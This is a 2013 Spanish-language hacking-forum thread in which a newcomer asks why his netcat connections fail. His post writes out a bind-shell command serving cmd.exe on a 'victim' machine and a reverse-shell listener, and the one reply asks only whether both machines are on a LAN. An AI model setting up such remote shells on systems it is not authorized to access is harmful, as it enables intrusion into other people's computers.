elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Dudas sobre el netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Dudas sobre el netcat  (Leído 2,060 veces)
rey1234

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Dudas sobre el netcat
« en: 25 Octubre 2013, 18:13 pm »

 :rolleyes:  pues si un cordial saludo a todos soy nuevo en este tema del netcat y he aquí vengo a pedir orientaciones sobre esto pues he buscado por todo Internet pero no he podido salir de dudas a si que primeramente he estado entrar a una maquina por varios puertos con el netcat lo tengo instalado en ambas maquinas en la victima y atacante primero intente la conexión normal esa la que dejo un netcat a la escucha en el puerto 6000 de la victima (nc -L -d -e cmd.exe -p 6000) y en la atacante nc -vv xxx.xxx.xxx.xx 6000 intento ingresar pero nada solo me da error host 1001 y a lo ultimo conexión refused not sock he intentado esto con varios puertos y me da el mismo resultado también he intentado la conexión inversa sin éxito pues en mi pc dejo escuchando (nc -vv -l -p 5000)  en cualquier puerto y nada de nada sin éxito se queda escuchando por 1 hora y nada ahora quiero que me saquen de dudas que es todo lo que tengo que hacer para poner a hacer funcionar el netcat si necesito hacer port triggering en mi maquina o la de la victima o cualquier cosa estoy aquí para aprender gracias de antemano
En línea

Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: Dudas sobre el netcat
« Respuesta #1 en: 9 Noviembre 2013, 19:24 pm »

estan en una LAN?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
dudas con netcat
Hacking
elnene68 0 1,772 Último mensaje 12 Octubre 2012, 17:47 pm
por elnene68
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines